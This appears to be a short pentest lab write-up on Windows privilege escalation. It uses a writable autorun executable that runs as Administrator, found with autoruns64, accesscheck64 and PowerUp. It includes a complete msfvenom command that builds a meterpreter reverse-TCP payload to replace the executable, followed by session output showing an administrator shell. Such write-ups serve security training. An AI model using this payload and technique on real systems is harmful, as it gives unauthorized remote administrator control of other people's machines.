If an executable with full write access is running as administrator and is configured to run at login, it can be replaced to run malicious code on logon. Windows sysinternals tool “autoruns64.exe” will display all executables configured to autorun. It does this by checking the registry for autorun flags.
“program.exe” looks out of place so we can check its access privileges with another tool called “accesscheck64.exe”.
Executable with full access running as Administrator that autoruns on login = privesc.
Checking via Power Shell
Another tool to check for autorun files is a powershell script called Powerup.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.240 LPORT=4444 -f exe -o program.exe
The next time a user logs into the machine the executable will send you a meterpreter shell as administrator.
[*] Started reverse TCP handler on 192.168.1.240:4444 [*] Sending stage (175174 bytes) to 192.168.1.50 [*] Meterpreter session 3 opened (192.168.1.240:4444 -> 192.168.1.50:49936) at 2021-10-16 20:40:59 -0400 meterpreter > shell Process 7272 created. Channel 1 created. Microsoft Windows [Version 10.0.17763.1294] (c) 2018 Microsoft Corporation. All rights reserved. C:\Users\Administrator\Desktop>whoami whoami pwnme0\administrator